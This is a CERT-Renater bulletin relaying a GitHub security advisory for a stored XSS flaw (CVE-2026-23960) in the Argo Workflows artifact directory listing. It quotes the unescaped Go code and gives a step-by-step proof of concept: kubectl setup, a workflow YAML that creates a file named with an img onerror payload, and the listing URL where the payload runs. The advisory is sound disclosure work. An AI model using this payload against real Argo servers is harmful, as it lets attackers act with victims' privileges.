Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN063
_____________________________________________________________________

DATE                : 22/01/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running argo-workflows (Go) versions
                                prior to 3.6.17, 3.7.8.

=====================================================================
https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cv78-6m8q-ph82
_____________________________________________________________________


Stored XSS in the artifact directory listing
High
Joibel published GHSA-cv78-6m8q-ph82 Jan 21, 2026

Package
github.com/argoproj/argo-workflows (Go)

Affected versions
<3.6.17
>=3.7.0, <3.7.7

Patched versions
3.6.17
3.7.8


Description

Summary

Stored XSS in the artifact directory listing allows any workflow 
author to execute arbitrary JavaScript in another user’s browser under 
the Argo Server origin, enabling API actions with the victim’s 
privileges.


Details

The directory listing response in server/artifacts/artifact_server.go 
renders object names directly into HTML via fmt.Fprintf without 
escaping. Object names come from driver.ListObjects(...) and are 
attacker‑controlled when a workflow writes files into an output 
artifact directory.

argo-workflows/server/artifacts/artifact_server.go

Lines 194 to 244 in 9872c29
 if isDir { 
 	// return an html page to the user 
  
 	objects, err := driver.ListObjects(ctx, artifact) 
 	if err != nil { 
 		a.httpFromError(ctx, err, w) 
 		return 
 	} 
 	a.logger.WithFields(logging.Fields{ 
 		"artifact": artifact, 
 		"files":    objects, 
 	}).Debug(ctx, "this is a directory") 
  
 	key, _ := artifact.GetKey() 
 	for _, object := range objects { 
  
 		// object is prefixed by the key, we must trim it 
 		dir, file := path.Split(strings.TrimPrefix(object, key+"/")) 
  
 		// if dir is empty string, we are in the root dir 
 		// we found in index.html, abort and redirect there 
 		if dir == "" && file == "index.html" { 
 			w.Header().Set("Location", r.URL.String()+"index.html") 
 			w.WriteHeader(http.StatusTemporaryRedirect) 
 			return 
 		} 
 	} 
  
 	w.WriteHeader(http.StatusOK) 
 	_, _ = w.Write([]byte("<html><body><ul>\n")) 
  
 	dirs := map[string]bool{} // to de-dupe sub-dirs 
  
 	_, _ = fmt.Fprintf(w, "<li><a href=\"%s\">%s</a></li>\n", "..", 
"..") 
  
 	for _, object := range objects { 
  
 		// object is prefixed the key, we must trim it 
 		dir, file := path.Split(strings.TrimPrefix(object, key+"/")) 
  
 		// if dir is empty string, we are in the root dir 
 		if dir == "" { 
 			_, _ = fmt.Fprintf(w, "<li><a href=\"%s\">%s</a></li>\n", 
file, file) 
 		} else if dirs[dir] { 
 			continue 
 		} else { 
 			_, _ = fmt.Fprintf(w, "<li><a href=\"%s\">%s</a></li>\n", 
dir, dir) 
 			dirs[dir] = true 
 		} 
 	} 
 	_, _ = w.Write([]byte("</ul></body></html>")) 


PoC

    Deploy Argo Workflows:

kubectl create ns argo
kubectl apply --server-side -f manifests/base/crds/full
kubectl apply --server-side -k manifests/quick-start/postgres

    Port‑forward Argo Server:

kubectl -n argo port-forward deploy/argo-server 2746:2746

    Create the PoC workflow:

cat > /tmp/argo-xss.yaml <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: xss-artifact-test-
spec:
  entrypoint: main
  templates:
  - name: main
    container:
      image: alpine
      command: [sh, -c]
      args:
      - |
        mkdir -p /tmp/artifacts
        touch '/tmp/artifacts/xss"><img src=x 
onerror="alert(document.domain)">.html'
    outputs:
      artifacts:
      - name: dir
        path: /tmp/artifacts
        archive:
          none: {}
EOF

kubectl -n argo create -f /tmp/argo-xss.yaml

    Wait for completion:

kubectl -n argo get wf -w

    Get the node ID:

kubectl -n argo get wf <wf-name> \
  -o jsonpath='{range 
.status.nodes.*}{.id}{"\t"}{.displayName}{"\n"}{end}'

    Open the listing:
    
https://localhost:2746/artifact-files/argo/workflows/<wf-name>/<nod
e-id>/outputs/dir/


image


Impact

    The attacker creates a workflow that produces a HTML artifact that 
contains a HTML file that contains a script which uses XHR calls 
to interact with the Argo Server API.
    The attacker emails the deep-link to the artifact to their victim. 
The victim opens the link, the script starts running.

As the script has access to the Argo Server API (as the victim), so 
may do the following (if the victim may):

    Read information about the victim’s workflows.
    Create or delete workflows.


Severity
High
7.3/ 10

CVSS v4 base metrics
Exploitability Metrics
Attack Vector Network
Attack Complexity High
Attack Requirements None
Privileges Required Low
User interaction Active
Vulnerable System Impact Metrics
Confidentiality High
Integrity High
Availability High
Subsequent System Impact Metrics
Confidentiality None
Integrity None
Availability None
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVE ID
CVE-2026-23960

Weaknesses
No CWEs


Credits

    @Masamuneee Masamuneee Reporter


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================